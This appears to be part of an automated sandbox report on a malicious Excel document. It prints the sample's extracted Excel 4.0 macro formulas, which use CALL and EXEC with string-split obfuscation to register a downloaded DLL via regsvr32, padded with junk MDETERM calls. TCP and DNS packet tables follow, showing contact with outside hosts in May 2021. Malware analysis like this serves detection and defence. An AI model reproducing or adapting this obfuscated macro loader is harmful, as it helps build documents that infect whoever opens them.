"=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"

"=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 13:32:31.075166941 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:31.239478111 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.239664078 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:31.240961075 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:31.405143023 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.429488897 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.429522991 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.429538965 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.429629087 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:31.429697037 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:31.448086977 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:31.611423969 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.611601114 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:31.612904072 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:31.820620060 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.859360933 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.859380960 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.859396935 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.859414101 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.859431028 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.859447956 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.859462023 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.859482050 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.859502077 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.859519958 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:31.859587908 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:31.859625101 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.025099993 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025116920 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025130033 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025141954 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025218010 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025229931 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.025239944 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025263071 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025289059 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025311947 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025321007 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.025336027 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025357962 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025378942 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025398016 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.025429010 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.025430918 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025458097 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025486946 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025495052 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.025509119 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025532007 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025552034 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025558949 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.025578976 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025604010 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.025612116 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.025656939 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.189590931 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189629078 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189651966 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189668894 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189740896 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189766884 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189785004 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189802885 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189819098 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.189825058 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189848900 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189873934 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189894915 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189905882 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.189918995 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189941883 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189961910 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.189964056 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189985037 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.189989090 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190010071 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190032005 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190052032 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190053940 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190077066 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190102100 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190103054 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190126896 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190135956 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190149069 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190170050 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190179110 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190192938 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190215111 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190218925 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190238953 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190239906 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190264940 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190274954 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190289974 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190301895 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190315008 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190325975 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190339088 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190351963 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190361023 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190383911 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190392017 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190427065 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190454960 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190500975 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190515041 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190536976 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190568924 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190570116 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190623999 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190628052 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190634966 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190664053 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190686941 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.190689087 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.190727949 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353024006 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353054047 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353072882 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353091955 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353108883 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353128910 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353147984 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353163958 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353179932 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353195906 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353212118 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353213072 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353229046 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353246927 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353266954 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353285074 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353301048 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353316069 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353317976 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353337049 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353353024 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353358984 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353370905 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353398085 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353421926 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353445053 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353465080 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353482962 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353499889 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353509903 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353542089 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353576899 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353588104 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353595972 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353612900 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353624105 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353629112 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353672981 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353769064 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353786945 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353801966 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353812933 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353822947 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353846073 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353880882 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353916883 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353935003 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353950977 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353960037 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.353966951 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.353996992 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354031086 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354096889 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354115963 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354130983 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354151011 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354154110 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354199886 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354284048 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354301929 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354316950 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354331017 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354337931 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354367971 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354409933 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354454041 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354501963 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354515076 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354532003 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354547977 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354578018 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354618073 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354644060 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354660988 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354681969 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354693890 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354700089 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354759932 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354808092 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354824066 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354846001 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354862928 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354865074 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354888916 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354928970 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.354962111 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354979038 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.354995012 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.355011940 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.355043888 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.355051994 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.355093956 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.355160952 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.355179071 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.355211973 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.355237961 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.397600889 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.397655964 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.397690058 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.397726059 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.397761106 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.397805929 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.397840977 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.397844076 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.397882938 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.397918940 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.397948027 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.397953987 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.397975922 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.397989988 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.398000956 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.398026943 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.398036957 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.398062944 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.398078918 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.398108006 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.398113012 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.398149014 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.398161888 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.398185015 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.398197889 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.398221016 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.398221016 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.398257971 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.398267984 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.398298979 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.517797947 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.517832994 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.517851114 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.517867088 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.517884970 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.517898083 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.517910004 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.517915964 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.517926931 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.517944098 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.517963886 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518030882 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518042088 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518052101 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518069029 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518078089 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518086910 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518104076 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518119097 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518158913 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518249035 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518265963 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518280983 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518301964 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518359900 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518359900 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518395901 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518477917 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518498898 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518517017 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518526077 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518532038 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518552065 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518577099 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518610954 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518629074 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518645048 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518656969 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518697023 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518788099 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518838882 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518860102 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518872023 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.518899918 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.518925905 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.526601076 CEST	49729	443	192.168.2.4	192.185.39.58
May 12, 2021 13:32:32.613013029 CEST	49734	443	192.168.2.4	192.185.32.232
May 12, 2021 13:32:32.689111948 CEST	443	49729	192.185.39.58	192.168.2.4
May 12, 2021 13:32:32.771229982 CEST	443	49734	192.185.32.232	192.168.2.4
May 12, 2021 13:32:32.771492004 CEST	49734	443	192.168.2.4	192.185.32.232
May 12, 2021 13:32:32.772411108 CEST	49734	443	192.168.2.4	192.185.32.232
May 12, 2021 13:32:32.930540085 CEST	443	49734	192.185.32.232	192.168.2.4
May 12, 2021 13:32:32.934338093 CEST	443	49734	192.185.32.232	192.168.2.4
May 12, 2021 13:32:32.934360981 CEST	443	49734	192.185.32.232	192.168.2.4
May 12, 2021 13:32:32.934375048 CEST	443	49734	192.185.32.232	192.168.2.4
May 12, 2021 13:32:32.934448004 CEST	49734	443	192.168.2.4	192.185.32.232
May 12, 2021 13:32:32.934505939 CEST	49734	443	192.168.2.4	192.185.32.232
May 12, 2021 13:32:32.946253061 CEST	49734	443	192.168.2.4	192.185.32.232
May 12, 2021 13:32:33.104923010 CEST	443	49734	192.185.32.232	192.168.2.4
May 12, 2021 13:32:33.105062008 CEST	49734	443	192.168.2.4	192.185.32.232
May 12, 2021 13:32:33.107165098 CEST	49734	443	192.168.2.4	192.185.32.232
May 12, 2021 13:32:33.305535078 CEST	443	49734	192.185.32.232	192.168.2.4
May 12, 2021 13:32:33.765057087 CEST	443	49734	192.185.32.232	192.168.2.4
May 12, 2021 13:32:33.765124083 CEST	49734	443	192.168.2.4	192.185.32.232
May 12, 2021 13:32:33.765665054 CEST	443	49734	192.185.32.232	192.168.2.4
May 12, 2021 13:32:33.765723944 CEST	49734	443	192.168.2.4	192.185.32.232
May 12, 2021 13:33:03.765847921 CEST	443	49734	192.185.32.232	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 13:32:11.700754881 CEST	64646	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:11.757498026 CEST	53	64646	8.8.8.8	192.168.2.4
May 12, 2021 13:32:12.278656960 CEST	65298	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:12.337564945 CEST	53	65298	8.8.8.8	192.168.2.4
May 12, 2021 13:32:12.353760958 CEST	59123	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:12.430588961 CEST	53	59123	8.8.8.8	192.168.2.4
May 12, 2021 13:32:12.962347031 CEST	54531	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:13.011122942 CEST	53	54531	8.8.8.8	192.168.2.4
May 12, 2021 13:32:16.957289934 CEST	49714	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:17.006031990 CEST	53	49714	8.8.8.8	192.168.2.4
May 12, 2021 13:32:17.961410999 CEST	58028	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:18.010879040 CEST	53	58028	8.8.8.8	192.168.2.4
May 12, 2021 13:32:19.583864927 CEST	53097	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:19.632714033 CEST	53	53097	8.8.8.8	192.168.2.4
May 12, 2021 13:32:19.727679014 CEST	49257	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:19.790978909 CEST	53	49257	8.8.8.8	192.168.2.4
May 12, 2021 13:32:24.190608978 CEST	62389	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:24.242945910 CEST	53	62389	8.8.8.8	192.168.2.4
May 12, 2021 13:32:25.419805050 CEST	49910	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:25.475008965 CEST	55854	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:25.496903896 CEST	53	49910	8.8.8.8	192.168.2.4
